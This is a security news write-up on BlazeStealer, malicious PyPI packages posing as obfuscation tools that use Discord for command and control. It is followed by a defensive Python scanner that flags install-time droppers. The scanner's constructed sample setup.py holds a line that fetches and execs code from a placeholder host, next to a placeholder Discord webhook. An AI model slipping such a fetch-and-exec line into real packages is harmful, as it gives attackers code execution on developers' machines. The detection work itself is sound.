November 9, 2023 at 06:16PM
Malicious Python packages masquerading as code obfuscation tools are targeting developers through the PyPI package repository. Known as “BlazeStealer,” the malware can steal data, launch keyloggers, encrypt files, and execute commands. The attackers go after developers working on code obfuscation because of the valuable and sensitive information such developers handle. BlazeStealer is the latest in a series of malicious Python packages, and it uses Discord as a command-and-control platform to take control of victims’ computers, including accessing their webcams.
Researchers at Checkmarx discovered the malware, dubbed “BlazeStealer,” in Python packages disguised as legitimate code obfuscation tools. The researchers emphasize that it is particularly alarming because it can exfiltrate host data, steal passwords, launch keyloggers, encrypt files, and execute host commands. The choice of target is strategic: developers who reach for obfuscation tools are likely to be working with valuable and sensitive code or data. Checkmarx has also tracked other malicious Python packages, such as PyLoose and culturestreak, both of which were used for unauthorized cryptomining.
BlazeStealer works by retrieving an additional malicious script from an external source, giving the attacker complete control over the victim’s computer. It uses the Discord messaging service as its command-and-control channel, through which the attacker can gather host data, download files, disable Windows Defender and Task Manager, and potentially lock the computer. The malware can also take over the PC’s webcam: it quietly downloads a .ZIP file containing WebCamImageSave.exe, a freeware utility, uses it to capture photos, sends the images back to the Discord channel, and then cleans up after itself so that little trace of its presence remains.
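One check a practitioner can apply to the behaviour described above is a static triage of a package's source before installing it. The Python script below is an added example, not code from Checkmarx or from the BlazeStealer packages. It parses each file of a source distribution with the standard ast module and flags the dropper shape the article describes: a network fetch fed straight into exec or eval, top-level calls in setup.py other than setup() (which run on every pip install of the sdist), and string constants pointing at the Discord API. The two sample packages embedded at the bottom are constructed for the demonstration; the package names and URLs in them are invented placeholders on reserved example domains, not real indicators.

```python
"""Static triage of a Python sdist for the dropper pattern described above:
code fetched from the network and executed on install, Discord as a channel.
Added example; not code from Checkmarx or from the BlazeStealer packages."""
from __future__ import annotations

import ast
import re
from dataclasses import dataclass

# Dotted call names that pull bytes from the network.
NETWORK_FETCH = {"urllib.request.urlopen", "urlopen", "requests.get",
                 "requests.post", "httpx.get"}
DYNAMIC_EXEC = {"exec", "eval"}              # sinks that turn data into code
SETUP_CALLS = {"setup", "setuptools.setup"}  # the only expected top-level call
# Discord API / webhook endpoints, the C2 channel the article describes.
DISCORD_RE = re.compile(r"https?://(?:\w+\.)?discord(?:app)?\.com/api/", re.I)


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    rule: str
    detail: str


def _dotted(node: ast.AST) -> str:
    """'pkg.mod.func' for a Name/Attribute chain, '' for anything else."""
    parts: list[str] = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _calls_any(node: ast.AST, names: set[str]) -> bool:
    """True if any call nested under node targets one of names."""
    return any(isinstance(n, ast.Call) and _dotted(n.func) in names
               for n in ast.walk(node))


def scan_source(path: str, source: str) -> list[Finding]:
    """Return indicator findings for one file of the distribution."""
    try:
        tree = ast.parse(source, filename=path)
    except SyntaxError as exc:
        return [Finding(path, exc.lineno or 0, "unparseable", str(exc))]
    findings: list[Finding] = []

    if path.endswith("setup.py"):
        # Any top-level call other than setup() runs on every `pip install`
        # of the sdist, which is exactly when a dropper wants to run.
        for stmt in tree.body:
            if (isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call)
                    and _dotted(stmt.value.func) not in SETUP_CALLS):
                findings.append(Finding(path, stmt.lineno, "setup_toplevel_side_effect",
                                        _dotted(stmt.value.func) or "<call>"))

    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _dotted(node.func) in DYNAMIC_EXEC \
                and node.args and not isinstance(node.args[0], ast.Constant):
            # exec/eval of a computed value; one fed by a network fetch is the dropper.
            rule = ("fetch_and_exec" if _calls_any(node.args[0], NETWORK_FETCH)
                    else "dynamic_exec")
            findings.append(Finding(path, node.lineno, rule, ast.unparse(node)[:80]))
        elif (isinstance(node, ast.Constant) and isinstance(node.value, str)
              and DISCORD_RE.search(node.value)):
            findings.append(Finding(path, node.lineno, "discord_c2_url", node.value))
    return findings


def triage(files: dict[str, str]) -> tuple[str, list[Finding]]:
    """Scan a distribution given as {path: source}; return verdict and findings."""
    findings = [f for path, src in files.items() for f in scan_source(path, src)]
    rules = {f.rule for f in findings}
    if rules & {"fetch_and_exec", "discord_c2_url"}:
        return "block", findings
    return ("review" if rules else "clean"), findings


# Constructed samples, not real packages; names and URLs are placeholders.
BENIGN_PACKAGE = {
    "setup.py": 'from setuptools import setup\n\nsetup(name="obf-tool", version="1.0")\n',
    "obf_tool/__init__.py": ("import base64\n\ndef obfuscate(src: str) -> str:\n"
                             "    return base64.b64encode(src.encode()).decode()\n"),
}
DROPPER_PACKAGE = {
    "setup.py": ("from setuptools import setup\nimport urllib.request\n\n"
                 "# Dropper shape: fetch stage two during install and run it.\n"
                 'exec(urllib.request.urlopen("https://stage2.example.invalid/s.py").read())\n\n'
                 'setup(name="pyobf-helper", version="0.1")\n'),
    "pyobf_helper/__init__.py":
        'WEBHOOK = "https://discord.com/api/webhooks/0/constructed-placeholder"\n',
}

if __name__ == "__main__":
    for label, pkg in (("benign", BENIGN_PACKAGE), ("dropper", DROPPER_PACKAGE)):
        verdict, findings = triage(pkg)
        print(label, verdict, *(f"{f.path}:{f.line} {f.rule}" for f in findings))
```

The scanner is deliberately narrow: it does not decode obfuscated payloads, so a package that hides the fetch behind string building or a base64 blob will only trigger the weaker dynamic_exec rule, which is why that rule yields a "review" verdict rather than a pass. Run it on an unpacked sdist (mapping each file path to its contents) before the package is installed, since anything in setup.py has already executed by the time pip reports success.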
Overall, BlazeStealer and similar malicious Python packages pose a significant threat, especially to developers involved in code obfuscation. Organizations should treat third-party packages as untrusted until reviewed (who publishes them, what runs at install time, and where they connect), and should regard outbound connections to Discord from developer or build machines as worth investigating.